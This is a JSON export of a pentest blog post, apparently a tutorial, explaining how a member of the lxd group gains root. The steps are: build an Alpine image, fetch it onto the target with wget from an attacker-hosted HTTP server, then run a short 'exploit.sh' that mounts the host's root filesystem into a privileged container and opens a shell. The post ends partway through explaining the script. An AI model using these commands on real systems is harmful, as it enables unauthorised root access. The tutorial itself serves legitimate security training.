{"id":331,"date":"2020-07-01T08:47:02","date_gmt":"2020-07-01T08:47:02","guid":{"rendered":"https:\/\/shreyapohekar.com\/blogs\/?p=331"},"modified":"2021-01-21T13:18:57","modified_gmt":"2021-01-21T13:18:57","slug":"lxd-privilege-escalation","status":"publish","type":"post","link":"https:\/\/shreyapohekar.com\/blogs\/lxd-privilege-escalation\/","title":{"rendered":"Lxd privilege escalation with security.privilege= true"},"content":{"rendered":"\n

Hello pentesters!! In this blog post, we will see how an account of the lxd group can elevate its privileges to admin (root).<\/p>\n\n\n\n

Vulnerability<\/h2>\n\n\n\n

A low privilege user can create a bridge between sockets on the host and its containers. When bridging from an existing socket on the host to a new socket in a container, it makes the connection with the credentials of the LXD service (root) as opposed to those of the calling user.<\/strong> Then, when a user speaks to the socket endpoint in the container, the message goes through the proxy and arrives at the host socket with root level credentials. More details can be found here.<\/span><\/a><\/p>\n\n\n\n

Here we will be using LXD API to mount the host\u2019s root filesystem into a container. And this will give root level access to a low-priv user.<\/p>\n\n\n\n

Basics of LXC and LXD<\/h2>\n\n\n\n

LXC stands for Linux container<\/strong>. It is a  lightweight virtualization technology that is something in the middle between a chroot and a completely developed virtual machine, which creates an environment as close as possible to a Linux installation but without the need for a separate kernel. LXC aims to use a feature of containers to provide a userspace container object which provides full resource isolation and resource control for an application or system. LXC is small enough to manage containers with simple command lines.<\/p>\n\n\n\n

LXD stands for Linux daemon.<\/strong> Its a next-gen container and VM manager. It provides a UNIX socket for local communication<\/strong>.<\/p>\n\n\n\n

Importing the image<\/h2>\n\n\n\n

One can list the contents of \/etc\/group to find out if any user is present in the lxd group.<\/p>\n\n\n\n

# cat \/etc\/group<\/pre>\n\n\n\n
\"user
user ash is present in the lxd group<\/figcaption><\/figure>\n\n\n\n
Now we can download the alpine linux for lxd from github.<\/p>\n\n\n\n
#  git clone https:\/\/github.com\/saghul\/lxd-alpine-builder.git\n#  cd lxd-alpine-builder\n# .\/build-alpine<\/pre>\n\n\n\n
<\/p>\n\n\n\n
It will create a  .tar.gz file. Send the file to the target machine with a simple python server. <\/p>\n\n\n\n
# python -m SimpleHTTPServer\n# wget http:\/\/10.10.14.42\/alpine-v3.12-x86_64-20200629_1550.tar.gz <\/pre>\n\n\n\n
<\/p>\n\n\n\n
To add an image to lxd run,<\/p>\n\n\n\n
# lxc image import .\/alpine-v3.12-x86_64-20200629_1550.tar.gz --alias myimage<\/pre>\n\n\n\n
To see the list of images run,<\/p>\n\n\n\n
# lxc image list<\/pre>\n\n\n\n
\"\"\/<\/figure>\n\n\n\n
Here we can clearly see that our image named myimage <\/strong>is listed.<\/p>\n\n\n\n
Privelege escalation<\/h2>\n\n\n\n
Create a script exploit.sh with a following set of commands and you will be good to go.<\/p>\n\n\n\n
lxc init myimage ignite -c security.privileged=true\nlxc config device add ignite mydevice disk source=\/ path=\/mnt\/root recursive=true\nlxc start ignite\nlxc exec ignite \/bin\/sh\nid<\/pre>\n\n\n\n
Lets break down what the script is doing!<\/p>\n\n\n\n
myimage <\/strong>is alias name and ignite <\/strong>is the name of container.<\/p>\n\n\n\n